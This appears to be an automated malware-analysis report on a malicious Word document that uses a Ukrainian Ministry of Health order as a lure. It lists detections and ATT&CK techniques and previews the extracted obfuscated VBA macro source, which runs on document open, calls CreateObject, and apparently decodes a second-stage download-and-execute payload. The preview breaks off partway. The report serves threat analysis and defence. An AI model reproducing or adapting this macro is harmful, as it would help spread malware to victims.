MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macro utilizes `CreateObject` and appears to be designed to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Win.Trojan.Agent-6754302-0'. The document body itself is a legitimate-looking Ukrainian Ministry of Health order, likely used as a lure.
Heuristics 4
-
ClamAV: Win.Trojan.Agent-6754302-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Agent-6754302-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19753 bytes |
SHA-256: c4452c9f2cdde8b8992403f91400bc730508221decaf11c2f4843d5cb47b2b3a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "MultiPage1, 0, 0, MSForms, MultiPage"
Function wKlkwjo(ByVal SumKCosSYkRj As String) As String
Dim PowtFJqMei As Long
For PowtFJqMei = 1 To Len(SumKCosSYkRj) Step 2
wKlkwjo = wKlkwjo & Chr$(Val("&H" & Mid$(SumKCosSYkRj, PowtFJqMei, 2)))
Next PowtFJqMei
End Function
Function CKfIRRlxzRvD()
With ActiveDocument.Shapes
For vewCajJPpWKnWAftFdF = .Count To 1 Step -1
.Item(vewCajJPpWKnWAftFdF).Delete
Next
End With
End Function
Sub MultiPage1_Layout(ByVal Index As Long)
Dim vewCajJPpWKnWAftFdF As String
Dim iSyyc As Object
Dim GQijhuWUBp As Integer
Dim IzgQFFpOZnufM As String
iNJHPLDMzeDX
CKfIRRlxzRvD
MultiPage1.Select
Selection.Delete Unit:=wdCharacter, Count:=1
GQijhuWUBp = 91
vewCajJPpWKnWAftFdF = wKlkwjo("a2beaebd") & wKlkwjo("b4bbbf799eb3b0b7b7")
Set iSyyc = CreateObject(MNAvWVMWDhuMlguKoVeni(vewCajJPpWKnWAftFdF))
IzgQFFpOZnufM = VfWCLKoCn("data1")
IzgQFFpOZnufM = KnuJMHpqeIXiDRV(iSyyc, IzgQFFpOZnufM, GQijhuWUBp)
End Sub
Function MuQKE(vewCajJPpWKnWAftFdF6 As String) As String
Dim TYcuGWtQJsEOlCtntyUtW As String
Dim dLuMmQtk As String
Dim OdokiJbxg As String
Dim zgOJnpNrKWZaNtps As String
Dim FvsVMOdbwnDuMRfN As String
Dim JWxzU As String
Dim OkyHbyyLyCGlaoMSZE As String
Dim tCJEjBB As String
tCJEjBB = "ƞȦ" & "oÆ”È" & "¨voÆ" & "žÈ¦o" & "ƓȨ" & wKlkwjo("74707d8081") & "¨ÈȆo" & "Æ®Èy" & "m³«�" & wKlkwjo("acafabb0") & wKlkwjo("bd9e6d7973") & wKlkwjo("6dc67bc8") & "Æ|Èmkx" & "±rŒrwr" & "¯¯rty" & "”¹Áº¶°" & "ssmÆ}ÈÆ|" & "ÈÆ{Èm" & "kx±k" & wKlkwjo("72bab6b4b0727772") & "ºrwr" & "Žrtwsm" & "Æ{ÈÆ‚ÈÆ ÈÆ" & wKlkwjo("84c8c683c8c680c8c67c7b") & "ÈÆ�ÈÆ|ÈÆ}" & wKlkwjo("c8c67ec86d6b78b16b72beb0bebe727772b5bb8d7277728272") & wKlkwjo("77727f887277") & "rzrwr—rwr˜¼rwr´º¹ˆ�"
dLuMmQtk = "rwr�" & "Œ¿¬r" & wKlkwjo("77729aac") & "¯rwr" & "�rty" & "”¹Áº" & wKlkwjo("b6b0736f") & wKlkwjo("c69eab90") & wKlkwjo("bdc8766fc6") & "¿Èt†o" & wKlkwjo("c6b4aba1") & "ȈoƯ" & "Œ«ŸŒ" & "Ȧ{yy~" & "¨†oÆ�Œ" & "«ŸŒÈˆ" & "oƯ«Œ" & wKlkwjo("9f8cc8a67f") & "yyoÆ�¬" & "«ŸŒÈym·" & wKlkwjo("90b9b2ab9fb36d") & "¨†xµ" & "º´¹¦Ž" & "“Œ½¦¨¨" & wKlkwjo("73a9716b6fc69dc8") & wKlkwjo("6b6fc6afab8cbf8c") & "Èkso" & "Æ”«¡ÈvoÆ–Ètt©Ç©qsmÆ{ÈÆ|" & "Èmx±r”�rwr£" & "rtkkqqk¾�Ÿkk¢°¹ˆ�®³"
zgOJnpNrKWZaNtps = "¬½”¬�" & wKlkwjo("b7906b6b") & wKlkwjo("736d83907b") & wKlkwjo("986d766d") & "”Âmt" & "kkxÁ¬·" & " °š¹·k" & "t……m" & "¯�«‘Œ" & wKlkwjo("c0b7bfa2abb0") & "�»«�«" & "šÃÄm†oÆ¢«" & "®Èym›«�šÃ" & wKlkwjo("a46d796daebd90afabb0") & "™Ÿ´«Œ·¾" & "mkˆkkko~š¥ " & "°±……m�°±«ŒÀ·Ÿ" & wKlkwjo("9990bfa2ba") & wKlkwjo("bdab96ae") & "«��«�°¹«Ÿ«”Œ«·ž" & "m†oƶȈ" & "kkožŒ�|……m¬žŽ«””mysmÆ}ÈÆ|ÈÆ{Èmkx±r¾rwrŸ°rwr’�¿"
FvsVMOdbwnDuMRfN = "rwr®¡�›}rwrÀ®Ã" & wKlkwjo("b096c0b8b8bdc1727772b09c727474866fc69eab909dc8") & "ˆsmÆ ÈÆ" & "}ÈÆ|ÈÆ{ÈÆ~Èmkx±r¹¿yº½²…" & " rwr¾°rwr" & "zz¸Ärwr~rwr³¿¿" & "»¾…rt†oƟȈsmÆ|ÈÆ~ÈÆ{ÈÆ}Èm" & wKlkwjo("6b78b172baaf7277727a727772c0b7b0be7ab8acb4b979bbb3") & wKlkwjo("bb727772b87274866fc6af8cab9f8cc8886fc6c2abaec879736dc67ec8c67bc8c67dc8c67cc86d6b78b16b72bac2b997")
OdokiJbxg = "¦oƪ" & "ÈpoÆ" & wKlkwjo("b6c8796d") & wKlkwjo("8ebaaba0b9") & wKlkwjo("9f6da87470") & "}€�†" & "oƞȦ" & "oƪȨ" & wKlkwjo("776fc69ec8") & "¦oƵ" & wKlkwjo("c8a8886f") & wKlkwjo("c6bec8a66fc6b5") & wKlkwjo("c8a8776fc69ec8") & wKlkwjo("a66fc6aac8") & "¨È†oÆ�È©" & "Ç©qsrpr" & "tÆoÆ”È" & "ˆsoÆ”" & wKlkwjo("c8767c7470") & wKlkwjo("7d8081866fc6b3c88873") & "oƳÈvoƾÈ" & "¦oƔȨtp}" & "€�†oƞȦoÆ´" & wKlkwjo("c8a8776fc6bec8a66fc693c8a8886fc6be") & "ȦoƳȨwoƞȦoƔȨ†oƪÈx�Ú" & wKlkwjo("bd6fc6bec8a6736f")
JWxzU = "šk”°" & "£kks" & "’�¿x" & wKlkwjo("949fb0b8") & wKlkwjo("6b90b9c1") & "…’¯Å�" & "±tyÁ" & w
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.